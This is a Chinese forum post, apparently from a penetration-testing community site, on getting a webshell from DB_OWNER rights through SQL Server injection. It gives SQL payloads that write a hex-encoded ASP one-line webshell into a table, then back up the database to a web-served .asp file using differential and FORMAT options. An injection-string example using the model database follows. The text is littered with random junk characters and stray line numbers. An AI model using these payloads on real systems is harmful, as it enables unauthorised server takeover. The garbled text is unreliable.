中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进办法 [打印本页]
作者: admin    时间: 2012-11-9 21:31
标题: DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
. K: s- O9 t$ t6 t% J5 R" v% ]6 h- j1 T. \; A; f
减少备份文件大小,得到可执行的webshell成功率提高不少% k' q; P3 W: T0 X/ e5 J3 {% t* |
一利用差异备份
3 T) ~+ r- I/ ]" m4 L! I加一个参数WITH DIFFERENTIAL
$ y% D& R1 `- y0 [; p8 ?( u
5 Y6 ~& I- P  s5 t9 v* L11 a6 q1 d7 c( E: V. a+ v6 J# Z
2
, {$ L. Z4 X: S3. B1 I) a: m% Q2 O6 M* o
4
8 d; Z" u' j% ^3 f8 ~' V declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s4 a. [* S. s' J* O7 L( z/ b
create table [dbo].[xiaolu] ([cmd] [image]);" O* Z3 \2 j- x- E8 k5 ~
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E): ?0 p! R' L7 m9 @
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL & A4 a" B9 }2 g2 `/ p& ?

) [) p2 A& M1 h二利用完全FORMAT! I. f. H6 s8 r+ w; J+ S
加一个参数WITH FROMAT
6 U: d' h9 g: f2 z有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以5 R& M" S1 o) ^! F0 D% y# o
( w: W* b' u5 I8 y+ Z
1
4 P6 D% n' ~# p2
$ }% k' z; W: c8 b1 r3
& t% T* E: N! O+ P- I3 b/ b4# ]: `0 _/ [  |6 J2 K
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
- ~+ R% ?+ e# q% ?( t. |, L2 xcreate table [dbo].[xiaolu] ([cmd] [image]);
8 Q5 g$ C! @% C( Iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
% P" C; d% x% [: n/ D. bdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT ( G# k6 J7 O1 f8 b0 d
# F2 y% J6 g7 J4 m' H0 ^4 P& T- X+ c
总的来说就是那么简单几句,下面以备份数据库model为例子3 s& ~! g3 e* C
1
+ b: V9 Z: w8 c. c) Q9 b1 z  ^+ Y6 z* |. L$ y8 Q% C
1, D- v8 B( U5 O4 t$ J. `
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
; ]( s5 ]; s" {- ]. i  I0 `& O7 ^) L0 W: I3 k! }! ]
2$ d, D2 D4 L" `) `! z9 z, Z
" D$ j4 G5 O% w  H' |6 c
1) |* P* e/ y% E: U: Z+ w
id=1;backup database model to disk='你的路径‘ with differential,format;--
& K3 z: C% [* ?9 K



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2